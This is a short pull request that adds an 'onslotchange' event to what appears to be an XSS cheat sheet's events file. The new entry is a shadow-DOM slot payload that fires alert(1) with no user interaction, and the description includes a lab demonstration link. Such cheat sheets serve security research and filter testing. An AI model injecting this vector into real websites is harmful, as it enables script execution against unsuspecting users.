### PR TITLE
Add onslotchange event - no user interaction

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -6452,5 +6452,16 @@
         "interaction": false
       }
     ]
+  },
+  "onslotchange": {
+    "description": "Fires when the slot’s assigned content changes",
+    "tags": [
+      {
+        "tag": "slot",
+        "code": "x<template shadowrootmode=open><slot onslotchange=alert(1)>",
+        "browsers": ["chrome", "firefox", "safari"],
+        "interaction": false
+      }
+    ]
   }
 }


### PR DESCRIPTION
For a quick demonstration, use https://portswigger-labs.net/xss/xss.php?x=x%3Ctemplate%20shadowrootmode=open%3E%3Cslot%20onslotchange=alert(1)%3E